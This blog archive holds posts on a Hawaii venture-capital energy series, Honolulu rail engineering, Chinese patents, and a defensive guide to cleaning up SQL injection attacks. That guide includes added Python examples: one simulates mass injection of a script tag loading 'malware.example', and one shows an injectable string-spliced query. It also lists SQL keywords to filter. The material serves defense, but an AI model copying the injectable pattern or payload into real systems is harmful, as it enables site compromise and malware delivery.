Archive for August, 2008

Trying to Explain the HVCA’s Energy Series

August 31st, 2008
By



One of my favorite nonprofit directorships is the Hawaii Venture Capital Association, organized 20 years ago and led by Bill Spencer.

The HVCA is not about robber barons, it’s about local entrepreneurs trying really hard to build a diversified economy in Hawaii, and their need for venture capital, just as Silicon Valley needs venture capital, to do that.

These days, HVCA certainly seems like it’s on a roll. Bill decided to do a series on energy, and so far it’s worked out really well.

JULY 24TH

The kickoff was on July 24th, entitled the Renewable Energy Challenge – Sectors and Issues Facing Energy Entrepreneurs.

The panel talked about Geothermal, Sea Water, Biodiesel, Solar and Wind. They were Don Thomas of the Center for Active Volcanoes; Frederick Berg of Honolulu Sea Water Air Conditioning; Bob King of Pacific Biodiesel; Mark Duda of Suntech; and Mike Gresham of First Wind.

The crowd at HVCA’s regular venue, the Plaza Club, was huge, a noticeable increase. Something was happening, but what, and why?

AUGUST 28TH

The second of the series was on August 28th. This one was called Policy and Regulatory Challenges Facing Renewable Energy Entrepreneurs.

The panel talked about the intersection of renewables and government. They were Warren Bollmeier of the Hawaii Renewable Energy Alliance; Bill Parks of the U.S. Department of Energy; Erik Kvam of Zero Emissions Leasing; and Robbie Alm of Hawaiian Electric.

The crowd was nearly capacity at 140, including everyone from a battalion of legislators and government to energy entrepreneurs, investors and a platoon of MBA students from the Shidler Business College. What’s more, they wouldn’t leave after the program was over.

Is Hawaii’s regulatory environment adequate to fast track renewable energy? Can entrepreneurs expect minimal regulatory risk? Is the path to selling excess energy back to the grid workable? What’s a Power Purchase Agreement and how do you get HECO to give you one?

You can see videos of both programs on HVCA.com.  Click here for the promo, then you can click here for the July program and click here for the August program.

WHAT CAN WE LEARN

Both programs were eye-openers, but the underlying phenomenon is something to think about. Why all this excitement? What does the success of the series tell us?

One thing is that HVCA has found the sweet spot in presenting these programs to the business community. And Bill Spencer has found how to conceptualize these programs in a way that appeals to the business community in general, and that’s also great.

Energy is sizzling these days. There are enthusiastic entrepreneurs who want to talk up their projects. There are dedicated legislators who want to find out what’s going on for the next session. There are cautious investors who want to scope out the players so they can place their bets.

It seems unanimous. People are agreeing that Hawaii is behind but can and must catch up, that Hawaii is in a position to be a world leader in renewable energy, and that our business and government leaders need to recognize this and give it top priority. That’s worth talking about.

A COMING TOGETHER?

The vitality of the HVCA energy series makes a number of statements, all of them encouraging. It speaks of the maturation of HVCA and its non-profit education and networking model, the maturation of Hawaii’s tech and investment community to the point where people know each other, have confidence in each other, want to learn from each other, and best of all want to work and invest with each other.

HVCA should be pleased that it has become a crucible in which this kind of phenomenon can take place.

And that’s how I would explain the success of this series and of HVCA in presenting the subject.

The series isn’t over. In September, tech hero and Blue Planet Software philanthropist Henk Rogers will present and show selected clips on what happened at the invitation-only energy seminar he organized this summer, and give us an inside view of where the policy makers want to go.

It wouldn’t surprise me if Henk also draws a big crowd.


The Engineering we will have to do for Rail

August 24th, 2008
By



Here in Sim City, engineering is not one of our strong suits. I had the extraordinary experience of riding the “rail” bus with Cliff Slater and Mayoral Candidate and Engineer Panos Prevedouros on Saturday. I was so moved by the experience that I am driven to write about it.

First, going West from Ala Moana to Mapunapuna, Panos talked about the critical need to synchronize the traffic signals.  This is not high-tech.  He also showed us the path and capacity of the HOT lane he is proposing, which at some points in the downtown area is below the street, and that’s an interesting engineering and traffic management challenge. He is confident it can be done and that it will work.

But nothing compared to the engineering challenges we saw going East on the way back, where starting on Dillingham he gave us an engineering tour of the proposed rail line as it comes back into and through downtown and to Ala Moana Center and then terminates at the University.

We just followed the City’s map to see where the proposed line is supposed to be going, how high and wide it would be and where the stations were. It was a real eye-opener, a revelation for everyone on the tour. We had no idea of what is going to happen to our City.

Actually, you wouldn’t believe it. The rail is going to tear up and permanently reduce a number of streets and intersections. Where there are 4 lanes there will be two because of all the supporting structures and pylons they’ll have to build. You won’t be able to drive down those streets anymore – too narrow. Many of them will lose their sidewalks too.

Dillingham will be different and dark. Those stations are 200 feet long and 60 feet wide and over everything. The engineering will change those neighborhoods forever. The merchants at the stations will do fine, but those in the middle will be in no-man’s land. Lots of land will have to be condemned where the streets are less than 60 feet wide.

The rail, if you didn’t know it, doesn’t follow a straight path; it twists and turns in every direction. Since it is a railroad, these turns can’t be at 90 degrees. The train has to make large sweeping turns. The sharper the turn, the louder the squeal of the steel wheels. In any event, large areas will have to be condemned and demolished to accommodate the turns. It will cost a fortune – is this and the related litigation included in the price tag?

The line comes East on Nimitz, Halekawila, Queen and Waimanu Streets - these will have the rail overhead and will be forever lost in the shadows. I can only think of the elevated line in upper Manhattan, something that lower Manhattan would never tolerate these days. Depressing for retail, a magnet for crime. Are we going to love it?

The engineering really gets dicey around Ala Moana – the top of the station at Ala Moana climbs to 135 feet, a 13-storey building. The pylons will be frequent and formidable, and they will have to punch through all that concrete on the mauka side of Ala Moana Center on Kona Street. It will cost a fortune. Will General Growth agree or just say no?

To get to the Ala Moana station at 135 feet in the air, the train will have to climb at a 5 percent grade along Kona Street. That’s a very steep grade for a rail line – and as high as a roller coaster. Watch for vertigo. This will involve huge engineering issues. I suppose we’ll solve these problems as we go, and those lessons will be costly. I imagine we’ll have to import and pay for lots of engineering talent from the mainland.

Thence in a sharp left turn from Kona across Atkinson and then again right to pass over the all-ways intersection at the Convention Center, then down the middle of Kapiolani to University, then a left turn up University, past Date and ultimately across King to the University. All of this way above grade, dwarfing everything around it. The City will look like Frankenstein.

I haven’t gotten into exactly where the stations are, since looking at those locations as shown on the City map it was hard to imagine that the City would actually put them in the places shown. Sometimes they were way too far apart and sometimes much too bunched up. There were three within 1/2 mile, for example, near the University.

There’s more. I could go on, but I would never do the tour justice. Why don’t you contact honolulutraffic.com and see if you can get on the tour yourself and see what I mean. Whatever your disposition, it’ll change the way you think.


Learning about Patents from China

August 21st, 2008
By



Although China has established itself as manufacturer for the world, most of the products it manufactures are invented elsewhere, so the profit China has made in manufacturing goods has been relatively small.

This is changing.  The website for SIPO, China’s Intellectual Property Office (sipo.gov.cn) reports that patent filings in China have dramatically increased every year since 1985, when the Patent Law was enacted.  In 2006, 573,000 applications were filed and 268,000 were granted.

It’s no surprise that China's leaders have been urging companies to be more innovative and to put more money into developing new IP.  That pitch must have worked, since China now generates the third highest number of patent applications, behind only Japan and the U.S.

Chinese inventors are also filing for international patents.  Of 156,000 patents filed with the World Intellectual Property Organization (WIPO) last year, 5,500 came from China.  This represents a 40% annual increase for China, now 7th worldwide.  The U.S. is still on top with 52,000, but China is competing vigorously, just as in the Olympics.


SQL Injection Attacks - how to deal with them

August 16th, 2008
By



SQL INJECTION ATTACKS – HOW TO DEAL WITH THEM

It's not like SQL injection attacks are new.

They go back to at least late 2004, when they appeared in Europe and Asia.  A German TV station was attacked, then a Taiwanese security magazine.  In 2006, Russian hackers broke into a Rhode Island government website and stole credit card data.

The attacks were proliferating.  In 2007, a hacker defaced the Microsoft UK web site.  Later that year, the UN website was defaced with a SQL injection attack.  Have they no shame?

In January 2008, tens of thousands of PC websites were defaced by automated SQL injection attacks that exploited the vulnerability of Microsoft SQL server.

In April 2008, the social security numbers of the sex offenders on the Sexual Offender Registry of Oklahoma were stolen by an injection attack.

In May 2008, a server farm in China used automated queries to Google's search engine to identify SQL server websites that were vulnerable.

In July 2008, the Malaysian site for Kaspersky, a Russian computer security company, was hacked using a SQL injection.

From April 2008 to the present, there have been increasing SQL injection attacks exploiting the SQL injection vulnerability of Microsoft Internet Information Services and SQL server.

HOW THE INJECTION ATTACK WORKS

These attacks don’t require the hacker to have access to the server or, for that matter, the names of database fields.  The attack hits all text fields in all tables with a single crafted SQL request.  It appends an HTML string to each field that loads a malware JavaScript file from a remote location.  When that value is later displayed to a user of the hacked site, the script tries to gain control over the user’s system.

The number of exploited web pages is estimated at 500,000 so far, and growing daily.  These attacks are across the board, against government sites as well as commercial sites, and against open source SQL databases as well as Microsoft SQL.  The attacking mechanisms can be manual or by automated spiders or by modified versions of popular software such as QuickTime and RealPlayer.

SQL is a rich and complex language, so there are many techniques by which the attack can be accomplished.  The common approach is for the hacker to modify a variable being passed from the user’s browser URL address line or from a form on the browser to a SQL search string which is being processed on the website.

With this approach, hackers or their automated spiders can inject draconian instructions into the SQL commands written for the site, and these can do any number of awful things, like stealing all the data from the SQL database, destroying the database altogether or modifying the records by adding references to remote malware that spreads the attack through innocent visitors using the site, in a kind of Trojan horse virus.

HOW DO YOU KNOW YOU’VE BEEN HIT

Don’t think you’re somehow exempt.  If you’re using SQL in any form you're vulnerable.  Most websites are data driven these days, and most of those use SQL in one form or another.  The hackers and their spiders may very well visit an attack on your site any time.

It goes without saying you need to back up your SQL database, all of it, every day, and keep those backups for perhaps a longer period of time than before.  If you have 10 days of backup but you don’t watch your site and 10 days go by, you won’t have a usable backup and you’ll be SOL.

How do you know you’ve been attacked?  Well, the data on your screen is truncated and you get strange characters like hanging apostrophes and angle brackets on your screen where database information ought to be.  Sometimes you get wise guy jokes there too.  Don't click on what appear to be links - that'll get you in more trouble and infect your machine too.

HOW TO DEAL WITH THEM

If you’ve been attacked, you need to go to Internet Information Services (IIS) on your server and cut user connections, and stop the site.  Then you need to find a good backup file to restore your database.  For that, you need to figure out when the attack happened so you can use a backup from before it happened.  If you don’t have a good backup, you’ll probably have to clean the database manually to recover the data for your site.

That means stripping out all the bad values and references that were injected.  You have to painstakingly go through every field, record and table.  In a big database, this can take forever, and it’s tedious and gut-wrenching work.  Worse, it may not be a complete solution.  The injection values are usually injected at the end of the existing values in the field, but if the injection values are longer than the field, they may write over the existing values, and that means the original data is lost.

When you’re done, you would turn IIS back on and see if you've done a good job, and whether there is some other gift they left for you.  You don't know until you bring the site up again and watch it work.

There are some scripts out there that say they can reverse the attack and clean the injected values out of your database. Here’s an example:

http://hackademix.net/2008/04/26/mass-attack-faq/#webdev

Different hackers inject different values, so there’s no guarantee that this will work.
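As an added example (not the post’s code nor the script linked above, and written against SQLite as a stand-in for SQL Server), here is the shape of the field-by-field check and clean-up described above: walk every character column in every table, flag values that carry an appended remote `<script>` tag, and strip the tag while keeping the original value in front of it. The payload pattern is a parameter because attackers vary it, and the database contents are constructed for the example.

```python
import re
import sqlite3

# Signature of the appended payload the post describes: a <script> tag loading
# a remote file. Attackers vary the exact value, so the pattern is a parameter.
SCRIPT_TAG = re.compile(r'<script\b[^>]*\bsrc\s*=[^>]*>\s*</script>', re.IGNORECASE)

def text_columns(conn):
    """Yield (table, column) for every character-typed column in every user table.
    Identifiers come from the schema, not from requests, so quoting them is safe."""
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        for _cid, name, ctype, *_ in conn.execute(f'PRAGMA table_info("{table}")'):
            if 'CHAR' in ctype.upper() or 'TEXT' in ctype.upper():
                yield table, name

def find_injected(conn, pattern=SCRIPT_TAG):
    """Return [(table, column, rowid, value)] for every field carrying the payload."""
    hits = []
    for table, column in list(text_columns(conn)):
        for rowid, value in conn.execute(f'SELECT rowid, "{column}" FROM "{table}"'):
            if isinstance(value, str) and pattern.search(value):
                hits.append((table, column, rowid, value))
    return hits

def clean_injected(conn, pattern=SCRIPT_TAG):
    """Strip the payload from every hit and keep what preceded it. Returns the
    number of fields rewritten. If the payload overwrote data (field too short),
    that original text is gone and only a backup can recover it."""
    hits = find_injected(conn, pattern)
    for table, column, rowid, value in hits:
        conn.execute(f'UPDATE "{table}" SET "{column}" = ? WHERE rowid = ?',
                     (pattern.sub('', value), rowid))
    conn.commit()
    return len(hits)

def sample_db():
    """Constructed SQLite stand-in for a hit site's database, then mass-injected."""
    conn = sqlite3.connect(':memory:')
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name VARCHAR(100), blurb TEXT, price REAL);
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO products VALUES (1, 'Ukulele', 'Koa wood', 250.0);
        INSERT INTO products VALUES (2, 'Slack key CD', 'Live set', 15.0);
        INSERT INTO news VALUES (1, 'Store hours', 'Open daily');
    """)
    payload = '<script src="http://malware.example/b.js"></script>'  # constructed
    for table, column in list(text_columns(conn)):  # append payload to every text field
        conn.execute(f'UPDATE "{table}" SET "{column}" = "{column}" || ?', (payload,))
    conn.commit()
    return conn
```

Run `find_injected` first and review the hits before calling `clean_injected`, since a pattern that is too broad will rewrite legitimate fields that merely contain a script tag.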

Even assuming you can restore your database, you could have another attack any time with similar result.  So if you have a good backup file of your database, make a protected copy of it for future use if necessary.

CLOSING THE VULNERABILITIES

Beyond that, you or your web designers need to close the vulnerabilities.  You can do that in a variety of ways, all of which involve new coding.  Go slowly and carefully, file by file, so you do it right and don't miss anything.

When you recode, you need to write routines to clean all the parameters that are being fed into your SQL queries.  To do this, you need to strip out any questionable SQL commands that could be part of an injection attack, including DECLARE, SELECT, SET, CAST, DROP, EXEC, ";", "--", INSERT, DELETE, XP_, VARCHAR and CHAR, among others.
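As an added example (not the post’s code, and using Python with SQLite in place of SQL Server), here is the vulnerable string-splicing query beside its parameterized form, plus an allow-list check on the parameter’s expected shape: binding the value with a placeholder is what stops a quote in the parameter from becoming part of the statement, which is the defect the keyword stripping above tries to patch over. The table, usernames and the username policy are constructed assumptions.

```python
import sqlite3

def sample_db():
    """Constructed stand-in for a data-driven site's user table (not real data)."""
    conn = sqlite3.connect(':memory:')
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT);
        INSERT INTO users VALUES (1, 'alice', 'alice@example.com');
        INSERT INTO users VALUES (2, 'o''brien', 'ob@example.com');
        INSERT INTO users VALUES (3, 'bob', 'bob@example.com');
    """)
    return conn

def find_user_unsafe(conn, username):
    """The vulnerable pattern the post describes: the request parameter is spliced
    into the SQL text, so a quote in it changes the statement instead of the data."""
    sql = "SELECT id, username FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()

def find_user_safe(conn, username):
    """Hardened form: the value is bound to a placeholder, so the database receives
    SQL and data separately and never parses the parameter as SQL."""
    sql = "SELECT id, username FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()

def username_is_well_formed(username):
    """Allow-list check on the expected shape, as defence in depth in front of the
    bound query (assumed policy: 1-32 letters, digits, apostrophe, dot, dash, underscore).
    An allow-list is easier to get right than a deny-list of SQL keywords."""
    return 1 <= len(username) <= 32 and all(c.isalnum() or c in "'._-" for c in username)

def compare(conn, username):
    """Run both forms on one input; the unsafe side returns the error text when
    the spliced statement no longer parses."""
    try:
        unsafe = find_user_unsafe(conn, username)
    except sqlite3.Error as exc:
        unsafe = f"error: {exc}"
    return unsafe, find_user_safe(conn, username)
```

`compare(conn, "o'brien")` shows the spliced statement failing on a legitimate apostrophe while the bound query returns the row; the same mechanism is what lets an attacker’s quote rewrite the statement.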

This is also quite tedious for a website of any size, but necessary if you want to avoid doing the whole thing again.  There are also other things you can do to make your code less vulnerable.  Here are a couple of links that will help you understand what needs to be done.

www.f-secure.com/weblog/archives/00001427.html

www.sitepoint.com/article/794

www.wwwcoder.com/main/parentid/258/site/2966/68/default.aspx

www.imperva.com/application_defense_center/white_papers/sql_injection_signatures_evasion.html

There are some programs that claim to identify your vulnerability to SQL injection attacks.  One is the Acunetix Scanner, used by a great number of U.S. and foreign companies and government agencies.  I guess it must be of some value.  Check it at www.acunetix.com.

There are books that can help.  See O’Reilly’s SQL Hacks by Andrew Cumming and Gordon Russell available at Amazon and Barnes and Noble.

WILL WE EVER CATCH THESE GUYS

This global proliferation of SQL injection attacks is not only irritating, it’s scary in that it has the ability to bring sites down all over the world.  It’s time for Microsoft to catch up.  It’s also time for world police authorities to catch up, and get serious.  This isn’t child’s play any more.
